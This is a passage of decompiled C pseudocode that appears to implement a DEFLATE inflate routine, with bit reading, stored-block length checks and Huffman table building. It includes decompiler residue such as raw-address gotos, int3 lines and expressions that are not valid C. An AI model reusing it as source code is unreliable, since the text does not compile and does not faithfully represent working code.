															asm("movdqu [edi], xmm0");
															asm("movdqu [edi+0x10], xmm0");
															asm("movdqu [edi+0x20], xmm0");
															asm("movdqu [edi+0x30], xmm0");
															asm("movdqu [edi+0x40], xmm0");
															asm("movdqu [edi+0x50], xmm0");
															asm("movdqu [edi+0x60], xmm0");
															asm("movdqa xmm0, [0x121ad0]");
															asm("movdqu [edi+0x70], xmm0");
															asm("movq [edi+0x80], xmm0");
															 *((intOrPtr*)(_t1038 + 0x88)) = 0x8080808;
															 *((intOrPtr*)(_t1038 + 0x8c)) = 0x8080808;
															_t1022 =  *(_t1058 - 0x14);
															goto L141;
														}
													}
												} else {
													L90:
													_t596 = _t1043 & 0x00000007;
													__eflags = _t1043 - _t596;
													if(_t1043 >= _t596) {
														L93:
														_t935 = _t1043 & 0x00000007;
														_t962 = _t991 >> _t935;
														_t1043 = _t1043 - _t935;
														 *(_t1058 - 4) = _t962;
														_t936 = 0;
														__eflags = 0;
														while(1) {
															L94:
															 *(_t1058 - 8) = _t936;
															__eflags = _t936 - 4;
															if(_t936 >= 4) {
																break;
															}
															L95:
															__eflags = _t1043;
															if(_t1043 == 0) {
																L101:
																__eflags = _t841 -  *(_t1058 - 0x20);
																if(_t841 >=  *(_t1058 - 0x20)) {
																	L244:
																	 *_t1022 = 7;
																	goto L285;
																} else {
																	L102:
																	_t596 =  *_t841;
																	_t841 = _t841 + 1;
																	(_t1022 + 0x2920)[_t936] = _t596;
																	_t936 = _t936 + 1;
																	 *(_t1058 - 0x18) = _t841;
																	continue;
																}
															} else {
																L96:
																__eflags = _t1043 - 8;
																if(_t1043 >= 8) {
																	L100:
																	(_t1022 + 0x2920)[_t936] = _t962;
																	_t1043 = _t1043 - 8;
																	_t962 = _t962 >> 8;
																	_t936 = _t936 + 1;
																	 *(_t1058 - 4) = _t962;
																	continue;
																} else {
																	while(1) {
																		L97:
																		__eflags = _t841 -  *(_t1058 - 0x20);
																		if(_t841 >=  *(_t1058 - 0x20)) {
																			break;
																		}
																		L98:
																		_t596 = ( *_t841 & 0x000000ff) << _t1043;
																		_t841 = _t841 + 1;
																		_t962 = _t962 | _t596;
																		 *(_t1058 - 0x18) = _t841;
																		_t1043 = _t1043 + 8;
																		 *(_t1058 - 4) = _t962;
																		__eflags = _t1043 - 8;
																		if(_t1043 < 8) {
																			continue;
																		} else {
																			L99:
																			_t936 =  *(_t1058 - 8);
																			goto L100;
																		}
																		goto L295;
																	}
																	L243:
																	 *_t1022 = 6;
																	goto L285;
																}
															}
															goto L295;
														}
														L103:
														_t596 =  *(_t1022 + 0x2922) & 0x000000ff;
														 *(_t1058 - 8) = ( *(_t1022 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1022 + 0x2920) & 0x000000ff;
														__eflags =  *(_t1058 - 8) - ((( *(_t1022 + 0x2923) & 0x000000ff) << 0x00000008 | _t596) ^ 0x0000ffff);
														if( *(_t1058 - 8) != ((( *(_t1022 + 0x2923) & 0x000000ff) << 0x00000008 | _t596) ^ 0x0000ffff)) {
															L265:
															 *(_t1058 - 0xc) = 0xffffffff;
															 *_t1022 = 0x27;
															goto L292;
														} else {
															L104:
															_t944 =  *(_t1058 - 8);
															while(1) {
																L105:
																__eflags = _t944;
																if(_t944 == 0) {
																	goto L85;
																}
																L106:
																__eflags = _t1043;
																if(_t1043 == 0) {
																	L113:
																	_t596 =  *(_t1058 - 0x10);
																	while(1) {
																		L114:
																		__eflags = _t944;
																		if(_t944 == 0) {
																			break;
																		}
																		L116:
																		_t1018 =  *((intOrPtr*)(_t1058 - 0x40));
																		__eflags = _t596 - _t1018;
																		if(_t596 < _t1018) {
																			L118:
																			_t596 =  *(_t1058 - 0x20);
																			__eflags = _t841 - _t596;
																			if(_t841 >= _t596) {
																				L247:
																				_t1022 =  *(_t1058 - 0x14);
																				 *_t1022 = 0x26;
																				goto L285;
																			} else {
																				L119:
																				_t962 = _t1018 -  *(_t1058 - 0x10);
																				_t1040 = _t596 - _t841;
																				__eflags = _t962 - _t1040;
																				_t814 =  <  ? _t962 : _t1040;
																				__eflags = ( <  ? _t962 : _t1040) - _t944;
																				if(( <  ? _t962 : _t1040) >= _t944) {
																					_t1022 = _t944;
																				} else {
																					__eflags = _t962 - _t1040;
																					_t1022 =  <  ? _t962 : _t1040;
																				}
																				L122:
																				L123:
																				memcpy();
																				_t841 = _t841 + _t1022;
																				_t596 =  *(_t1058 - 0x10) + _t1022;
																				_t1061 = _t1061 + 0xc;
																				 *(_t1058 - 0x18) = _t841;
																				_t944 =  *(_t1058 - 8) - _t1022;
																				 *(_t1058 - 0x10) = _t596;
																				 *(_t1058 - 8) = _t944;
																				continue;
																			}
																		} else {
																			L117:
																			_t1022 =  *(_t1058 - 0x14);
																			 *(_t1058 - 0xc) = 2;
																			 *_t1022 = 9;
																			goto L292;
																		}
																		goto L295;
																	}
																	L115:
																	goto 0x311388;
																	asm("int3");
																	goto L85;
																} else {
																	L107:
																	__eflags = _t1043 - 8;
																	if(_t1043 >= 8) {
																		L110:
																		_t596 = _t962 & 0x000000ff;
																		_t962 = _t962 >> 8;
																		_t1043 = _t1043 - 8;
																		 *(_t1058 - 0x28) = _t596;
																		 *(_t1058 - 4) = _t962;
																		L111:
																		__eflags =  *(_t1058 - 0x10) -  *((intOrPtr*)(_t1058 - 0x40));
																		_t1022 =  *(_t1058 - 0x14);
																		if( *(_t1058 - 0x10) >=  *((intOrPtr*)(_t1058 - 0x40))) {
																			L246:
																			 *(_t1058 - 0xc) = 2;
																			 *_t1022 = 0x34;
																			goto L292;
																		} else {
																			L112:
																			 *(_t1058 - 0x10) =  *(_t1058 - 0x10) + 1;
																			 *( *(_t1058 - 0x10)) = _t596;
																			_t944 =  *(_t1058 - 8) - 1;
																			 *(_t1058 - 8) = _t944;
																			continue;
																		}
																	} else {
																		while(1) {
																			L108:
																			__eflags = _t841 -  *(_t1058 - 0x20);
																			if(_t841 >=  *(_t1058 - 0x20)) {
																				break;
																			}
																			L109:
																			_t596 = ( *_t841 & 0x000000ff) << _t1043;
																			_t841 = _t841 + 1;
																			_t962 = _t962 | _t596;
																			 *(_t1058 - 0x18) = _t841;
																			_t1043 = _t1043 + 8;
																			 *(_t1058 - 4) = _t962;
																			__eflags = _t1043 - 8;
																			if(_t1043 < 8) {
																				continue;
																			} else {
																				goto L110;
																			}
																			goto L295;
																		}
																		L245:
																		 *_t1022 = 0x33;
																		goto L285;
																	}
																}
																goto L295;
															}
															continue;
														}
													} else {
														while(1) {
															L91:
															__eflags = _t841 -  *(_t1058 - 0x20);
															if(_t841 >=  *(_t1058 - 0x20)) {
																break;
															}
															L92:
															_t820 = ( *_t841 & 0x000000ff) << _t1043;
															_t1043 = _t1043 + 8;
															_t991 = _t991 | _t820;
															_t841 = _t841 + 1;
															 *(_t1058 - 0x18) = _t841;
															_t596 = _t1043 & 0x00000007;
															 *(_t1058 - 4) = _t991;
															__eflags = _t1043 - _t596;
															if(_t1043 < _t596) {
																continue;
															} else {
																goto L93;
															}
															goto L295;
														}
														L242:
														 *_t1022 = 5;
														goto L285;
													}
												}
											} else {
												while(1) {
													L87:
													__eflags = _t841 -  *(_t1058 - 0x20);
													if(_t841 >=  *(_t1058 - 0x20)) {
														break;
													}
													L88:
													_t596 = ( *_t841 & 0x000000ff) << _t1043;
													_t841 = _t841 + 1;
													_t962 = _t962 | _t596;
													 *(_t1058 - 0x18) = _t841;
													_t1043 = _t1043 + 8;
													 *(_t1058 - 4) = _t962;
													__eflags = _t1043 - 3;
													if(_t1043 < 3) {
														continue;
													} else {
														goto L89;
													}
													goto L295;
												}
												L241:
												 *_t1022 = 3;
												goto L285;
											}
											goto L295;
										}
										L252:
										_t596 = _t1043 & 0x00000007;
										__eflags = _t1043 - _t596;
										if(_t1043 >= _t596) {
											L256:
											_t683 =  *(_t1058 - 0x3c);
											_t886 = _t1043 & 0x00000007;
											_t986 = _t962 >> _t886;
											_t1043 = _t1043 - _t886;
											 *(_t1058 - 4) = _t986;
											__eflags = _t841 - _t683;
											if(_t841 > _t683) {
												while(1) {
													L257:
													__eflags = _t1043 - 8;
													if(_t1043 < 8) {
														goto L259;
													}
													L258:
													_t841 = _t841 - 1;
													_t1043 = _t1043 - 8;
													__eflags = _t841 - _t683;
													if(_t841 > _t683) {
														continue;
													}
													goto L259;
												}
											}
											L259:
											L260:
											_t596 = _t1043;
											asm("bts edx, eax");
											__eflags = _t596 - 0x20;
											_t888 =  >=  ? _t986 : 0;
											_t987 = _t986 ^ _t888;
											__eflags = _t596 - 0x40;
											_t889 =  >=  ? _t987 : _t888;
											 *(_t1058 - 4) =  *(_t1058 - 4) & _t987 - 0x00000001;
											__eflags =  *(_t1058 + 0x18) & 0x00000001;
											if(( *(_t1058 + 0x18) & 0x00000001) == 0) {
												L290:
												_t684 = 0;
												__eflags = 0;
												 *_t1022 = 0x22;
												L291:
												 *(_t1058 - 0xc) = _t684;
												goto L292;
											} else {
												L261:
												_t890 = 0;
												while(1) {
													L277:
													 *(_t1058 - 8) = _t890;
													__eflags = _t890 - 4;
													if(_t890 >= 4) {
														goto L290;
													}
													L278:
													__eflags = _t1043;
													if(_t1043 != 0) {
														L281:
														_t989 =  *(_t1058 - 4);
														__eflags = _t1043 - 8;
														if(_t1043 >= 8) {
															L275:
															_t685 = _t989 & 0x000000ff;
															_t1043 = _t1043 - 8;
															__eflags = _t1043;
															 *(_t1058 - 4) = _t989 >> 8;
															goto L276;
														} else {
															L282:
															while(1) {
																L272:
																__eflags = _t841 -  *(_t1058 - 0x20);
																if(_t841 >=  *(_t1058 - 0x20)) {
																	break;
																}
																L273:
																_t596 = ( *_t841 & 0x000000ff) << _t1043;
																_t1043 = _t1043 + 8;
																_t989 = _t989 | _t596;
																_t841 = _t841 + 1;
																 *(_t1058 - 4) = _t989;
																__eflags = _t1043 - 8;
																if(_t1043 < 8) {
																	continue;
																} else {
																	L274:
																	_t890 =  *(_t1058 - 8);
																	goto L275;
																}
																goto L295;
															}
															L284:
															 *_t1022 = 0x29;
															goto L285;
														}
													} else {
														L279:
														__eflags = _t841 -  *(_t1058 - 0x20);
														if(_t841 >=  *(_t1058 - 0x20)) {
															L283:
															 *_t1022 = 0x2a;
															goto L285;
														} else {
															L280:
															_t685 =  *_t841 & 0x000000ff;
															_t841 = _t841 + 1;
															L276:
															 *(_t1058 - 0x24) = _t685;
															_t596 =  *(_t1022 + 0x10) << 0x00000008 |  *(_t1058 - 0x24);
															_t890 = _t890 + 1;
															__eflags = _t890;
															 *(_t1022 + 0x10) = _t596;
															continue;
														}
													}
													goto L295;
												}
												goto L290;
											}
										} else {
											L253:
											while(1) {
												L254:
												__eflags = _t841 -  *(_t1058 - 0x20);
												if(_t841 >=  *(_t1058 - 0x20)) {
													break;
												}
												L255:
												_t690 = ( *_t841 & 0x000000ff) << _t1043;
												_t1043 = _t1043 + 8;
												_t962 = _t962 | _t690;
												_t841 = _t841 + 1;
												 *(_t1058 - 4) = _t962;
												_t596 = _t1043 & 0x00000007;
												__eflags = _t1043 - _t596;
												if(_t1043 < _t596) {
													continue;
												} else {
													goto L256;
												}
												goto L295;
											}
											L271:
											 *_t1022 = 0x20;
											goto L285;
										}
									}
								} else {
									L49:
									__eflags = _t1043 - 0xf;
									if(_t1043 < 0xf) {
										_t999 =  *(_t841 + 1) & 0x000000ff;
										_t880 = _t1043;
										_t721 =  *_t841 & 0x000000ff;
										_t841 = _t841 + 2;
										_t1022 =  *(_t1058 - 0x14);
										 *(_t1058 - 0x18) = _t841;
										 *(_t1058 - 4) =  *(_t1058 - 4) | (_t999 << 0x00000008 | _t721) << _t880;
										_t1043 = _t1043 + 0x10;
										__eflags = _t1043;
										_t962 =  *(_t1058 - 4);
									}
									_t714 =  *((short*)(_t1022 + 0x160 + (_t962 & 0x000003ff) * 2));
									 *(_t1058 - 0x1c) = _t714;
									__eflags = _t714;
									if(_t714 < 0) {
										L53:
										goto 0x311349;
										asm("int3");
										asm("int3");
										asm("int3");
										do {
											L54:
											_t716 = _t962 >> _t880;
											_t880 = _t880 + 1;
											_t841 =  *((short*)(_t1022 + 0x960 + ((_t716 & 0x00000001) +  !_t841) * 2));
											__eflags = _t841;
										} while (_t841 < 0);
										 *(_t1058 - 0x1c) = _t841;
										_t841 =  *(_t1058 - 0x18);
									} else {
										L52:
										_t880 = _t714 >> 9;
									}
									L56:
									_t596 =  *(_t1058 - 8);
									_t1043 = _t1043 - _t880;
									_t962 = _t962 >> _t880;
									 *(_t1058 - 4) = _t962;
									 *( *(_t1058 - 0x10)) = _t596;
									_t880 =  *(_t1058 - 0x1c);
									__eflags = _t880 & 0x00000100;
									if((_t880 & 0x00000100) != 0) {
										L83:
										_t170 = _t1058 - 0x10;
										 *_t170 =  *(_t1058 - 0x10) + 1;
										__eflags =  *_t170;
										goto L84;
									} else {
										L57:
										_t719 =  *(_t1058 - 0x10);
										 *(_t719 + 1) = _t880;
										 *(_t1058 - 0x10) = _t719 + 2;
										continue;
										do {
											do {
												while(1) {
													L39:
													_t879 =  *(_t1058 - 0x20) - _t841;
													__eflags = _t879 - 4;
													if(_t879 < 4) {
														goto L58;
													}
													goto L40;
												}
												L26:
												__eflags = _t877;
											} while (_t877 == 0);
											goto 0x3112e3;
											asm("int3");
											_t824 =  *_t830;
											 *_t1022 = _t824;
											_t1022 =  *(_t1058 - 0x14);
											__eflags = _t877 - 1;
											if(_t877 > 1) {
												L29:
												L36:
												goto 0x31131f;
												asm("int3");
												 *(_t982 + 1) =  *((intOrPtr*)(_t824 + 1));
												_t982 =  *(_t1058 - 4);
											}
											L38:
											_t85 = _t1058 - 0x10;
											 *_t85 = _t877 +  *(_t1058 - 0x10);
											__eflags =  *_t85;
											while(1) {
												L39:
												_t879 =  *(_t1058 - 0x20) - _t841;
												__eflags = _t879 - 4;
												if(_t879 < 4) {
													goto L58;
												}
												goto L40;
											}
											L33:
											 *(_t1058 - 0x10) = _t1022;
											_t1022 =  *(_t1058 - 0x14);
											 *(_t1058 - 0xc) = _t982;
											_t982 =  *(_t1058 - 4);
											 *(_t1058 - 8) = _t877;
											__eflags = _t877;
										} while (_t877 <= 0);
										goto 0x31130b;
										asm("int3");
										_t824 =  *_t666;
										 *_t1022 = _t824;
										_t1022 =  *(_t1058 - 0x14);
										__eflags = _t877 - 1;
										if(_t877 > 1) {
											goto L36;
										}
										goto L38;
									}
								}
							}
							goto L295;
							L58:
							__eflags = _t1043 - 0xf;
							if(_t1043 >= 0xf) {
								L75:
								_t669 =  *((short*)(_t1022 + 0x160 + (_t982 & 0x000003ff) * 2));
								 *(_t1058 - 8) = _t669;
								__eflags = _t669;
								if(_t669 < 0) {
									L77:
									goto 0x311372;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L78:
										_t671 = _t982 >> _t879;
										_t879 = _t879 + 1;
										_t596 = (_t671 & 0x00000001) +  !_t841;
										_t841 =  *((short*)(_t1022 + 0x960 + _t596 * 2));
										__eflags = _t841;
									} while (_t841 < 0);
									 *(_t1058 - 8) = _t841;
									_t841 =  *(_t1058 - 0x18);
								} else {
									L76:
									_t879 = _t669 >> 9;
									_t596 = _t669 & 0x000001ff;
									 *(_t1058 - 8) = _t596;
								}
								L80:
								_t962 = _t982 >> _t879;
								_t1043 = _t1043 - _t879;
								_t880 =  *(_t1058 - 8);
								 *(_t1058 - 4) = _t962;
								__eflags = _t880 - 0x100;
								if(_t880 >= 0x100) {
									goto L84;
								} else {
									L81:
									_t822 =  *(_t1058 - 0x10);
									__eflags = _t822 -  *((intOrPtr*)(_t1058 - 0x40));
									if(_t822 >=  *((intOrPtr*)(_t1058 - 0x40))) {
										L240:
										 *(_t1058 - 0xc) = 2;
										 *_t1022 = 0x18;
										goto L292;
									} else {
										L82:
										 *_t822 = _t880;
										 *(_t1058 - 0x10) = _t822 + 1;
										continue;
									}
								}
							} else {
								L59:
								__eflags = _t879 - 2;
								if(_t879 >= 2) {
									L73:
									_t992 =  *(_t841 + 1) & 0x000000ff;
									_t695 =  *_t841 & 0x000000ff;
									_t841 = _t841 + 2;
									_t879 = _t1043;
									 *(_t1058 - 0x18) = _t841;
									 *(_t1058 - 4) =  *(_t1058 - 4) | _t992 << _t1043 + 0x00000008 | _t695 << _t879;
									_t1043 = _t1043 + 0x10;
									__eflags = _t1043;
									_t982 =  *(_t1058 - 4);
									goto L74;
								} else {
									do {
										L60:
										_t596 = _t982 & 0x000003ff;
										_t1025 =  *((short*)(_t1022 + 0x160 + _t596 * 2));
										__eflags = _t1025;
										if(_t1025 < 0) {
											L64:
											__eflags = _t1043 - 0xa;
											if(_t1043 <= 0xa) {
												goto L69;
											} else {
												L65:
												 *(_t1058 - 0x1c) = _t879;
												while(1) {
													L67:
													_t1025 =  *((short*)( *(_t1058 - 0x14) + 0x960 + ((_t982 >> _t879 & 0x00000001) +  !_t1025) * 2));
													_t879 =  *(_t1058 - 0x1c) + 1;
													 *(_t1058 - 0x1c) = _t879;
													__eflags = _t1025;
													if(_t1025 >= 0) {
														goto L74;
													}
													L68:
													_t596 = _t879 + 1;
													__eflags = _t1043 - _t596;
													if(_t1043 >= _t596) {
														continue;
													} else {
														goto L69;
													}
													goto L295;
												}
												goto L74;
											}
										} else {
											L61:
											_t1027 = _t1025 >> 9;
											__eflags = _t1027;
											if(_t1027 == 0) {
												L69:
												_t1022 =  *(_t1058 - 0x14);
												L70:
												__eflags = _t841 -  *(_t1058 - 0x20);
												if(_t841 >=  *(_t1058 - 0x20)) {
													L239:
													 *_t1022 = 0x17;
													goto L285;
												} else {
													goto L71;
												}
											} else {
												L62:
												__eflags = _t1043 - _t1027;
												if(_t1043 >= _t1027) {
													L74:
													_t1022 =  *(_t1058 - 0x14);
													goto L75;
												} else {
													L63:
													goto L69;
												}
											}
										}
										goto L295;
										L71:
										_t879 = _t1043;
										_t699 = ( *_t841 & 0x000000ff) << _t879;
										_t841 = _t841 + 1;
										_t982 = _t982 | _t699;
										 *(_t1058 - 0x18) = _t841;
										_t1043 = _t1043 + 8;
										 *(_t1058 - 4) = _t982;
										__eflags = _t1043 - 0xf;
									} while (_t1043 < 0xf);
									goto L75;
								}
							}
							goto L295;
						}
					}
					L142:
					 *(_t1058 - 0xc) = 0x40 + _t694 * 0xda0 + _t1022;
					memset(_t1058 - 0xd0, 0, 0x40);
					memset( *(_t1058 - 0xc) + 0x120, 0, 0x800);
					memset( *(_t1058 - 0xc) + 0x920, 0, 0x480);
					_t894 = 0;
					_t1061 = _t1061 + 0x24;
					_t1005 = _t1022 + ( *(_t1022 + 0x18) + 0xb) * 4;
					 *(_t1058 - 0x44) = _t1005;
					__eflags =  *_t1005;
					if( *_t1005 > 0) {
						L143:
						_t1022 =  *(_t1058 - 0xc);
						do {
							L144:
							_t797 =  *(_t894 + _t1022) & 0x000000ff;
							_t894 = _t894 + 1;
							 *((intOrPtr*)(_t1058 + _t797 * 4 - 0xd0)) =  *((intOrPtr*)(_t1058 + _t797 * 4 - 0xd0)) + 1;
							__eflags = _t894 -  *_t1005;
						} while (_t894 <  *_t1005);
					}
					L145:
					goto 0x3113d7;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					L146:
					 *(_t1058 - 0x8c) = _t894;
					 *(_t1058 - 0x90) = _t894;
					 *(_t1058 - 0x2c) = _t894;
					 *(_t1058 - 0x30) = _t894;
					do {
						L147:
						_t734 =  *((intOrPtr*)(_t1058 + _t1005 - 0xd4));
						_t896 = _t894 + _t734 + _t894 + _t734;
						_t1022 = _t1022 + _t734;
						_t735 =  *((intOrPtr*)(_t1058 + _t1005 - 0xd0));
						 *(_t1058 - 0x30) =  *(_t1058 - 0x30) + _t735;
						 *((intOrPtr*)(_t1058 + _t1005 - 0x90)) = _t896;
						_t736 =  *((intOrPtr*)(_t1058 + _t1005 - 0xcc));
						_t898 = _t896 + _t735 + _t896 + _t735;
						 *(_t1058 - 0x2c) =  *(_t1058 - 0x2c) + _t736;
						 *((intOrPtr*)(_t1058 + _t1005 - 0x8c)) = _t898;
						_t894 = _t898 + _t736 + _t898 + _t736;
						 *(_t1058 + _t1005 - 0x88) = _t894;
						_t1005 = _t1005 + 0xc;
						__eflags = _t1005 - 0x40;
					} while (_t1005 <= 0x40);
					 *(_t1058 - 0x4c) = _t894;
					 *(_t1058 - 0x24) = _t1022;
					_t1022 =  *(_t1058 - 0x14);
					_t901 =  *(_t1058 - 0x24) +  *(_t1058 - 0x2c) +  *(_t1058 - 0x30);
					__eflags =  *(_t1058 - 0x4c) - 0x10000;
					if( *(_t1058 - 0x4c) == 0x10000) {
						L150:
						_t739 =  *(_t1058 - 0x44);
						 *(_t1058 - 0x30) = 0xffffffff;
						 *(_t1058 - 0x4c) = 0;
						__eflags =  *_t739;
						if( *_t739 > 0) {
							L151:
							_t1057 =  *(_t1058 - 0x4c);
							do {
								L152:
								L153:
								_t913 =  *(_t1057 + _t739) & 0x000000ff;
								 *(_t1058 - 0x44) = _t913;
								__eflags = _t913;
								if(_t913 != 0) {
									L154:
									_t776 =  *(_t1058 + _t913 * 4 - 0x90);
									 *(_t1058 - 0x2c) = _t776;
									 *(_t1058 + _t913 * 4 - 0x90) = _t776 + 1;
									 *(_t1058 - 0x24) = _t913;
									__eflags = _t913;
									if(_t913 != 0) {
										L155:
										do {
											L156:
											 *(_t1058 - 0x2c) =  *(_t1058 - 0x2c) >> 1;
											_t796 =  *(_t1058 - 0x24) - 1;
											_t1005 = _t1005 + _t1005 |  *(_t1058 - 0x2c) & 0x00000001;
											 *(_t1058 - 0x24) = _t796;
											__eflags = _t796;
										} while (_t796 != 0);
										_t913 =  *(_t1058 - 0x44);
									}
									L158:
									__eflags = _t913 - 0xa;
									if(_t913 > 0xa) {
										L164:
										_t780 =  *(_t1058 - 0xc) + 0x120 + (_t1005 & 0x000003ff) * 2;
										_t841 =  *(_t1058 - 0x30);
										 *(_t1058 - 0x44) = _t780;
										_t781 =  *_t780;
										 *(_t1058 - 0x2c) = _t781;
										__eflags = _t781;
										if(_t781 == 0) {
											 *( *(_t1058 - 0x44)) = _t841;
											_t781 = _t841;
											_t841 = _t841 - 2;
											__eflags = _t841;
											 *(_t1058 - 0x2c) = _t781;
											 *(_t1058 - 0x30) = _t841;
										}
										L166:
										_t1013 = _t1005 >> 9;
										__eflags = _t913 - 0xb;
										if(_t913 > 0xb) {
											L167:
											_t914 = _t913 + 0xfffffff5;
											__eflags = _t914;
											 *(_t1058 - 0x24) = _t914;
											_t915 =  *(_t1058 - 0x2c);
											do {
												L168:
												_t1013 = _t1013 >> 1;
												_t786 = 0x48f - _t915 - (_t1013 & 0x00000001);
												_t918 =  *( *(_t1058 - 0xc) + 0x91e) & 0x0000ffff;
												__eflags = _t918;
												if(_t918 != 0) {
													_t915 = _t918;
												} else {
													 *( *(_t1058 - 0xc) + _t786 * 2) = _t841;
													_t787 =  *(_t1058 - 0x30);
													_t915 = _t787;
													_t788 = _t787 - 2;
													 *(_t1058 - 0x30) = _t788;
													_t841 = _t788;
												}
												L171:
												_t361 = _t1058 - 0x24;
												 *_t361 =  *(_t1058 - 0x24) - 1;
												__eflags =  *_t361;
											} while ( *_t361 != 0);
											 *(_t1058 - 0x2c) = _t915;
											_t781 = _t915;
										}
										L173:
										_t1005 = (_t1013 >> 0x00000001 & 0x00000001) - _t781;
										__eflags = _t1005;
										 *( *(_t1058 - 0xc) + 0x91e + _t1005 * 2) = _t1057;
									} else {
										L159:
										_t793 = (_t913 << 0x00000009 | _t1057) & 0x0000ffff;
										 *(_t1058 - 0x44) = _t793;
										__eflags = _t1005 - 0x400;
										if(_t1005 < 0x400) {
											L160:
											goto 0x311401;
											asm("int3");
											asm("int3");
											asm("int3");
											L161:
											_t794 = _t793 << _t913;
											 *(_t1058 - 0x4c) = _t794 + _t794;
											_t923 =  *(_t1058 - 0xc) + _t1005 * 2 + 0x120;
											__eflags = _t923;
											do {
												L162:
												 *_t923 = _t1022;
												_t1005 = _t1005 + _t794;
												_t923 = _t923 +  *(_t1058 - 0x4c);
												__eflags = _t1005 - 0x400;
											} while (_t1005 < 0x400);
											_t1022 =  *(_t1058 - 0x14);
										}
									}
								}
								L174:
								_t739 =  *(_t1022 + 0x18);
								_t1057 = _t1057 + 1;
								__eflags = _t1057 -  *((intOrPtr*)(_t1022 + 0x2c + _t739 * 4));
							} while (_t1057 <  *((intOrPtr*)(_t1022 + 0x2c + _t739 * 4)));
							goto 0x311417;
							asm("int3");
						}
						L176:
						__eflags =  *(_t1022 + 0x18) - 2;
						if( *(_t1022 + 0x18) != 2) {
							L217:
							 *(_t1022 + 0x18) =  *(_t1022 + 0x18) - 1;
							goto L141;
						} else {
							L177:
							_t902 = 0;
							__eflags = 0;
							while(1) {
								L178:
								_t1006 =  *(_t1058 - 4);
								while(1) {
									L179:
									 *(_t1058 - 8) = _t902;
									__eflags = _t902 -  *(_t1022 + 0x30) +  *(_t1022 + 0x2c);
									if(_t902 >=  *(_t1022 + 0x30) +  *(_t1022 + 0x2c)) {
										break;
									}
									L180:
									__eflags = _t1057 - 0xf;
									if(_t1057 >= 0xf) {
										L197:
										_t754 =  *((short*)(_t1022 + 0x1ca0 + (_t1006 & 0x000003ff) * 2));
										 *(_t1058 - 0x28) = _t754;
										__eflags = _t754;
										if(_t754 < 0) {
											L199:
											L200:
											do {
												L201:
												 *(_t1058 - 0x28) =  !( *(_t1058 - 0x28));
												_t756 = _t1006 >> _t902;
												_t902 = _t902 + 1;
												_t596 =  *((short*)(_t1022 + 0x24a0 + ((_t756 & 0x00000001) +  *(_t1058 - 0x28)) * 2));
												 *(_t1058 - 0x28) = _t596;
												__eflags = _t596;
											} while (_t596 < 0);
										} else {
											L198:
											_t902 = _t754 >> 9;
											_t596 = _t754 & 0x000001ff;
											 *(_t1058 - 0x28) = _t596;
										}
										L202:
										_t1006 = _t1006 >> _t902;
										_t1043 = _t1057 - _t902;
										 *(_t1058 - 4) = _t1006;
										 *(_t1058 - 0x1c) = _t1043;
										__eflags = _t596 - 0x10;
										if(__eflags >= 0) {
											L204:
											if(__eflags != 0) {
												L207:
												_t903 =  *((char*)(_t596 + 0x120ff0));
												 *(_t1058 - 0x38) = _t903;
												__eflags = _t1043 - _t903;
												if(_t1043 >= _t903) {
													L211:
													_t1043 = _t1043 - _t903;
													 *(_t1058 - 0x1c) = _t1043;
													_t904 =  *(_t1058 - 0x14);
													_t1032 = ((0x00000001 << _t903) - 0x00000001 & _t1006) +  *((char*)(_t596 + 0x120ff8));
													__eflags =  *(_t1058 - 0x28) - 0x10;
													_t760 =  *(_t1058 - 8);
													 *(_t1058 - 4) = _t1006 >> _t903;
													if( *(_t1058 - 0x28) != 0x10) {
														_t1009 = 0;
														__eflags = 0;
													} else {
														_t1009 =  *(_t760 + _t904 + 0x2923) & 0x000000ff;
													}
													L214:
													memset(_t760 + _t904 + 0x2924, _t1009, _t1032);
													_t1061 = _t1061 + 0xc;
													_t902 =  *(_t1058 - 8) + _t1032;
													_t1022 =  *(_t1058 - 0x14);
													L178:
													_t1006 =  *(_t1058 - 4);
													continue;
												} else {
													while(1) {
														L208:
														__eflags = _t841 -  *(_t1058 - 0x20);
														if(_t841 >=  *(_t1058 - 0x20)) {
															break;
														}
														L209:
														_t596 = ( *_t841 & 0x000000ff) << _t1043;
														_t841 = _t841 + 1;
														_t903 =  *(_t1058 - 0x38);
														_t1006 = _t1006 | _t596;
														_t1043 = _t1043 + 8;
														 *(_t1058 - 0x18) = _t841;
														 *(_t1058 - 4) = _t1006;
														__eflags = _t1043 - _t903;
														if(_t1043 < _t903) {
															continue;
														} else {
															L210:
															_t596 =  *(_t1058 - 0x28);
															goto L211;
														}
														goto L295;
													}
													L251:
													 *_t1022 = 0x12;
													goto L285;
												}
											} else {
												L205:
												_t764 =  *(_t1058 - 8);
												__eflags = _t764;
												if(_t764 == 0) {
													L268:
													_t684 = _t764 | 0xffffffff;
													 *_t1022 = 0x11;
													goto L291;
												} else {
													L206:
													_t596 =  *(_t1058 - 0x28);
													goto L207;
												}
											}
										} else {
											L203:
											_t908 =  *(_t1058 - 8);
											 *(_t1022 + 0x2924 + _t908) = _t596;
											_t902 = _t908 + 1;
											continue;
										}
									} else {
										L181:
										__eflags =  *(_t1058 - 0x20) - _t841 - 2;
										if( *(_t1058 - 0x20) - _t841 >= 2) {
											L195:
											_t1010 =  *(_t841 + 1) & 0x000000ff;
											_t767 =  *_t841 & 0x000000ff;
											_t841 = _t841 + 2;
											_t902 = _t1057;
											 *(_t1058 - 0x18) = _t841;
											 *(_t1058 - 4) =  *(_t1058 - 4) | _t1010 << _t1057 + 0x00000008 | _t767 << _t902;
											_t1057 = _t1057 + 0x10;
											__eflags = _t1057;
											_t1006 =  *(_t1058 - 4);
											goto L196;
										} else {
											do {
												L182:
												_t596 = _t1006 & 0x000003ff;
												_t1033 =  *((short*)(_t1022 + 0x1ca0 + _t596 * 2));
												__eflags = _t1033;
												if(_t1033 < 0) {
													L186:
													__eflags = _t1057 - 0xa;
													if(_t1057 <= 0xa) {
														goto L191;
													} else {
														L187:
														L188:
														 *(_t1058 - 0x24) = _t902;
														while(1) {
															L189:
															_t1033 =  *((short*)( *(_t1058 - 0x14) + 0x24a0 + ((_t1006 >> _t902 & 0x00000001) +  !_t1033) * 2));
															_t902 =  *(_t1058 - 0x24) + 1;
															 *(_t1058 - 0x24) = _t902;
															__eflags = _t1033;
															if(_t1033 >= 0) {
																goto L196;
															}
															L190:
															_t596 = _t902 + 1;
															__eflags = _t1057 - _t596;
															if(_t1057 >= _t596) {
																continue;
															} else {
																goto L191;
															}
															goto L295;
														}
														goto L196;
													}
												} else {
													L183:
													_t1035 = _t1033 >> 9;
													__eflags = _t1035;
													if(_t1035 == 0) {
														L191:
